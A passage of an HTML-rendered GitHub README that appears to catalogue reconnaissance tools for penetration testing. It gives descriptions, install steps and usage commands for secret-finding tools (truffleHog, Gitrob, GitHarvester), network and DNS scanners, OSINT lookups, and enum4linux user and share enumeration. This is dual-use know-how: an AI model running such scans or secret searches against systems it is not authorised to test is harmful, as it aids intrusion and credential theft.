4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"./githarvester.py\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e./githarvester.py\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dxa4481/truffleHog\"\u003etruffleHog\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-trufflehog\" class=\"anchor\" aria-label=\"Permalink: 🔙truffleHog\" href=\"#trufflehog\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Binaries):\u003c/strong\u003e \u003ca href=\"https://github.com/trufflesecurity/trufflehog/releases\"\u003eLink\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Go):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"trufflehog https://github.com/trufflesecurity/test_keys\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003etrufflehog https://github.com/trufflesecurity/test_keys\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/zhzyker/dismap\"\u003eDismap\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dismap\" class=\"anchor\" aria-label=\"Permalink: 🔙Dismap\" href=\"#dismap\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDismap is a binary file for Linux, MacOS, and Windows. Go to \u003ca href=\"https://github.com/zhzyker/dismap/releases\"\u003eRelease\u003c/a\u003e to download the corresponding version to run:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Linux or MacOS\u003c/span\u003e\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Windows\u003c/span\u003e\ndismap-0.3-windows-amd64.exe -h\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Scan 192.168.1.1 subnet\n./dismap -i 192.168.1.1/24\n\n# Scan, output to result.txt and json output to result.json\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\n./dismap -i 192.168.1.1/24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n./dismap -i 192.168.1.1/24 -t 1000\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan 192.168.1.1 subnet\u003c/span\u003e\n./dismap -i 192.168.1.1/24\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, output to result.txt and json output to result.json\u003c/span\u003e\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\u003c/span\u003e\n./dismap -i 192.168.1.1/24 --np --timeout 10\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, Number of concurrent threads 1000\u003c/span\u003e\n./dismap -i 192.168.1.1/24 -t 1000\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/zhzyker/dismap\"\u003ehttps://github.com/zhzyker/dismap\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/CiscoCXSecurity/enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-enum4linux\" class=\"anchor\" aria-label=\"Permalink: 🔙enum4linux\" href=\"#enum4linux\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool for enumerating information from Windows and Samba systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to gather a wide range of information, including:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDomain and domain controller information\u003c/li\u003e\n\u003cli\u003eLocal user and group information\u003c/li\u003e\n\u003cli\u003eShares and share permissions\u003c/li\u003e\n\u003cli\u003eSecurity policies\u003c/li\u003e\n\u003cli\u003eActive Directory information\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Apt)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install enum4linux\"\u003e\u003cpre\u003esudo apt install enum4linux\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/CiscoCXSecurity/enum4linux\ncd enum4linux\"\u003e\u003cpre\u003egit clone https://github.com/CiscoCXSecurity/enum4linux\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e enum4linux\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e 'Do everything'\u003c/span\u003e\nenum4linux.pl -a 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obtain list of usernames (RestrictAnonymous = 0)\u003c/span\u003e\nenum4linux.pl -U 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obtain list of usernames (using authentication)\u003c/span\u003e\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get a list of groups and their members\u003c/span\u003e\nenum4linux.pl -G 192.168.2.55\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Verbose scan \u003c/span\u003e\nenum4linux.pl -v 192.168.2.55\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found in this \u003ca href=\"https://labs.portcullis.co.uk/tools/enum4linux/\" rel=\"nofollow\"\u003eblog\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/\" rel=\"nofollow\"\u003ehttps://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Esc4iCEscEsc/skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-skanuvaty\" class=\"anchor\" aria-label=\"Permalink: 🔙skanuvaty\" href=\"#skanuvaty\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDangerously fast dns/network/port scanner, created by \u003ca href=\"https://github.com/Esc4iCEscEsc\"\u003eEsc4iCEscEsc\u003c/a\u003e, written in rust.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou will need a subdomains file. \u003cem\u003eE.g. \u003ca href=\"https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt\" rel=\"nofollow\"\u003eSubdomain wordlist by Sublist3r\u003c/a\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload the latest release from \u003ca href=\"https://github.com/Esc4iCEscEsc/skanuvaty/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Install a wordlist\nsudo apt install wordlists\nls /usr/share/dirb/wordlists\nls /usr/share/amass/wordlists\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Install a wordlist\u003c/span\u003e\nsudo apt install wordlists\nls /usr/share/dirb/wordlists\nls /usr/share/amass/wordlists\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\"\u003e\u003cpre\u003eskanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/Esc4iCEscEsc/skanuvaty\"\u003ehttps://github.com/Esc4iCEscEsc/skanuvaty\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/j3ssie/metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-metabigor\" class=\"anchor\" aria-label=\"Permalink: 🔙Metabigor\" href=\"#metabigor\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMetabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eMain Features:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eSearching information about IP Address, ASN and Organization.\u003c/li\u003e\n\u003cli\u003eWrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.\u003c/li\u003e\n\u003cli\u003eFinding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).\u003c/li\u003e\n\u003cli\u003eGet Summary about IP address (powered by \u003ca href=\"https://github.com/theblackturtle\"\u003e@thebl4ckturtle\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install github.com/j3ssie/metabigor@latest\"\u003e\u003cpre\u003ego install github.com/j3ssie/metabigor@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# discovery IP of a company/organization\necho \u0026quot;company\u0026quot; | metabigor net --org -o /tmp/result.txt\n\n# Getting more related domains by searching for certificate info\necho 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command\n\n# Only run rustscan with full ports\necho '1.2.3.4/24' | metabigor scan -o result.txt\n\n# Reverse Whois to find related domains\necho 'example.com' | metabigor related -s 'whois'\n\n# Get Google Analytics ID directly from the URL\necho 'https://example.com' | metabigor related -s 'google-analytic'\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e discovery IP of a company/organization\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ecompany\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor net --org -o /tmp/result.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Getting more related domains by searching for certificate info\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eTarget Inc\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor cert --json \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e jq -r \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e.Domain\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e unfurl format %r.%t \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sort -u \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e this is old command\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Only run rustscan with full ports\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e1.2.3.4/24\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor scan -o result.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Reverse Whois to find related domains\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eexample.com\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor related -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ewhois\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get Google Analytics ID directly from the URL\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://example.com\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e metabigor related -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003egoogle-analytic\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/j3ssie/metabigor\"\u003ehttps://github.com/j3ssie/metabigor\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/michenriksen/gitrob\"\u003eGitrob\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gitrob\" class=\"anchor\" aria-label=\"Permalink: 🔙Gitrob\" href=\"#gitrob\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.\u003c/p\u003e\n\u003cp 